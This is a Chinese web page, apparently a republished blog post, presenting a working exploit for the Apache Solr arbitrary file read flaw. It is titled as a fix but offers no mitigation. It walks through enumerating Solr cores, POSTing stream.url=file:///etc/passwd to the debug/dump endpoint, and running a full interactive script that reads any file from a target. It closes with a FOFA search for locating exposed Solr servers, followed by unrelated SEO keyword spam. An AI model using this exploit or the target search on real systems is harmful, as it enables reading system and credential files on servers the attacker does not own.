千家信息网

请输入关键字词

热门搜索排行

最新搜索排行

导航: 首页 > 网络安全 >

Apache-Solr任意文件读取exp怎么解决

发表于:2024-12-04 作者:千家信息网编辑
千家信息网最后更新 2024年12月04日,本篇内容主要讲解"Apache-Solr任意文件读取exp怎么解决",感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习"Apache-Solr任意文件读取exp怎
千家信息网最后更新 2024年12月04日Apache-Solr任意文件读取exp怎么解决

本篇内容主要讲解"Apache-Solr任意文件读取exp怎么解决",感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习"Apache-Solr任意文件读取exp怎么解决"吧!

Apache-Solr任意文件读取exp

漏洞利用方式很简单,但是网上说的不是很完整。

首先我们需要访问:

/solr/admin/cores?indexInfo=false&wt=json

然后看相应数据:

{  "responseHeader":{    "status":0,    "QTime":0},  "initFailures":{},  "status":{    "ingredients":{      "name":"ingredients",      "instanceDir":"/var/solr/data/ingredients",      "dataDir":"/var/solr/data/ingredients/data/",      "config":"solrconfig.xml",      "schema":"schema.xml",      "startTime":"2021-03-18T11:41:26.398Z",      "uptime":211644}}}

差不多这个样子,ingredients就是我们需要的

构造路径:

"/solr/".ins."/debug/dump?param=ContentStreams&wt=json"

ins就是我们得到的实例对象的名称

他们说会返回xml格式的,网上的都是不带wt=json,但是我发现,dump接受这个参数,也会输出json格式

并且我们在上面获取ins的时候是可以判断服务器类型的

上面的话呢应该是:

/solr/ingredients/debug/dump?param=ContentStreams&wt=json

然后是个post数据包,路径有了,内容就是:

stream.url=file:///etc/passwd

然后也会得到一个json,这里就不带结果了

最后附上exp:

#define insqian = "name":"#define inshou = "#define contentqian = "stream":"#define contenthou = "}]function Getinstance(url){        res = HttpGetSafe(url."/solr/admin/cores?indexInfo=false&wt=json","User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0");        if(StrFindStr(res[0],"initFailures",0) == "-1"){                return "";        }        return GettextMiddle(res[0],insqian,inshou);}function GetFileContent(url,ins,FilePath){        res = HttpPostSafe(url."/solr/".ins."/debug/dump?param=ContentStreams&wt=json","stream.url=file://".FilePath,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0");        con = GettextMiddle(res[0],contentqian,contenthou);        return StrReplace(con,"\\n",StrRN());        }function main(args){        print("请输入测试的站点:");        url = input();        ins = Getinstance(url);        if(ins == ""){                print("不存在漏洞");        }else{                print("可能存在漏洞,instanceName:".ins.",请输入要查看的文件名称:");                wb = input();                while(wb != "exit"){                        print(GetFileContent(url,ins,wb));                        wb = input();                }        }}

带一张效果图:

fofa搜索:

app="Apache-Solr"

到此,相信大家对"Apache-Solr任意文件读取exp怎么解决"有了更深的了解,不妨来实际操作一番吧!这里是网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!

很赞哦!
文件 内容 就是 漏洞 名称 数据 格式 路径 学习 输入 实用 更深 差不多 兴趣 参数 实例 实用性 实际 对象 操作简单 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 基带软件开发做些什么 网络安全教育学习感悟 巢湖软件开发培训咨询 数据库和电子商务的关联 网络安全法存在的问题包括 win服务器安全加固 下列不属于数据库管理 模糊神经网络安全评价模型 怀化导航软件开发 浙江知名软件开发多少钱 网络安全周 文汇网 数据库系统是由构成的 媒体数据库与云存储 中国网络安全成员 租服务器的要求 安卓开发服务器 计算机网络技术对口企业 女生软件开发找工作 怀旧服服务器双采攻略 上海高校党建软件开发哪儿好 备份oracle数据库教程 k神 数据库 云服务器已离线 跨境电商软件开发公司 黄山网络安全考试价格 模糊神经网络安全评价模型 开发公司的服务器安全 进销存软件开发服务商 怎么申请企业密信服务器 成都交友软件开发报价

相关文章

0